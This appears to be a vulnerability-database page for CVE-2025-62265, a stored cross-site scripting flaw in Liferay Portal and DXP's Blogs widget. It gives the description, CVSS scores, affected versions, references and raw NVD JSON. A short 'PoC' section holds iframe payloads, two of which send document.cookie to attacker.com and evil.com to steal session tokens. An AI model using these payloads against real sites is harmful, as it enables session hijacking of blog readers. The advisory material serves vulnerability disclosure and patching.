CVE-2025-62265

Description

Cross-site scripting (XSS) vulnerability in the Blogs widget in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, 7.3 GA through update 36, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via a crafted <iframe> injected into a blog entry's “Content” text field The Blogs widget in Liferay DXP does not add the sandbox attribute to <iframe> elements, which allows remote attackers to access the parent page via scripts and links in the frame page.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:2023.q3.1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:2023.q3.2:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:2023.q3.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:2023.q3.4:*:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.4.0 through 7.4.3.111

Liferay Portal older unsupported versions

Liferay DXP 2023.Q4.0 through 2023.Q4.10

Liferay DXP 2023.Q3.1 through 2023.Q3.8

Liferay DXP 7.4 GA through update 92

Liferay DXP 7.3 GA through update 36

Liferay DXP older unsupported versions

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-62265 PoC: Stored XSS via iframe without sandbox attribute -->
<!-- This PoC demonstrates how to inject malicious iframe into Liferay Blogs Content field -->

<!-- Step 1: Create a blog entry with malicious iframe in Content field -->
<!-- Insert the following payload in the Blog's Content text field: -->

<iframe src="javascript:alert(document.cookie)" width="0" height="0" style="display:none"></iframe>

<!-- Or more sophisticated payload -->
<iframe src="data:text/html,<script>fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie))</script>" sandbox="allow-scripts allow-same-origin"></iframe>

<!-- Step 2: When victim views the blog, the script executes -->
<!-- The iframe can access parent page context due to missing sandbox attribute -->

<!-- Example: Stealing session tokens -->
<iframe src="javascript:(function(){var x=document.createElement('img');x.src='https://evil.com/log?c='+encodeURIComponent(document.cookie);document.body.appendChild(x)})()" style="visibility:hidden"></iframe>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62265
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62265
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62265/
[4] VulDB https://vuldb.com/cve/CVE-2025-62265
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62265

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62265", "sourceIdentifier": "[email protected]", "published": "2025-10-30T19:16:35.490", "lastModified": "2025-11-11T01:58:54.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in the Blogs widget in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, 7.3 GA through update 36, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via a crafted <iframe> injected into a blog entry's “Content” text field \n\nThe Blogs widget in Liferay DXP does not add the sandbox attribute to <iframe> elements, which allows remote attackers to access the parent page via scripts and links in the frame page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.4", "matchCriteriaId": "5F7BCC0B-5F36-4E6B-AABE-61B88E9A99D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.1:*:*:*:*:*:*:*", "matchCriteriaId": "1EF6451A-2A5D-4222-A1C6-113AA4B8D4E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.2:*:*:*:*:*:*:*", "matchCriteriaId": "9D6CE430-3C95-4855-BA44-E2E136D1FEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.3:*:*:*:*:*:*:*", "matchCriteriaId": "44FEB149-C792-493D-B055-568FFC96298A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.4:*:*:*:*:*:*:*", "matchCriteriaId": "B050DD73-71B6-46CD-A35B-7ACB53BE6C6A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.5:*:*:*:*:*:*:*", "matchCriteriaId": "62432289-E1DC-4013-85C7-6B77299A910F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.6:*:*:*:*:*:*:*", "matchCriteriaId": "0912EEFE-DC56-43F6-AE0E-A4E2A033F3C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.7:*:*:*:*:*:*:*", "matchCriteriaId": "9398F679-5F47-4DF2-AA91-4A21126675C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.8:*:*:*:*:*:*:*", "matchCriteriaId": "8296B54A-976A-404C-AB77-0619E4297A69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5CE3202-2723-44A6-B63F-061138287FDA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.1:*:*:*:*:*:*:*", "matchCriteriaId": "A27A8480-7EE1-4265-9117-D6C234ACAC5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:lif ... (truncated)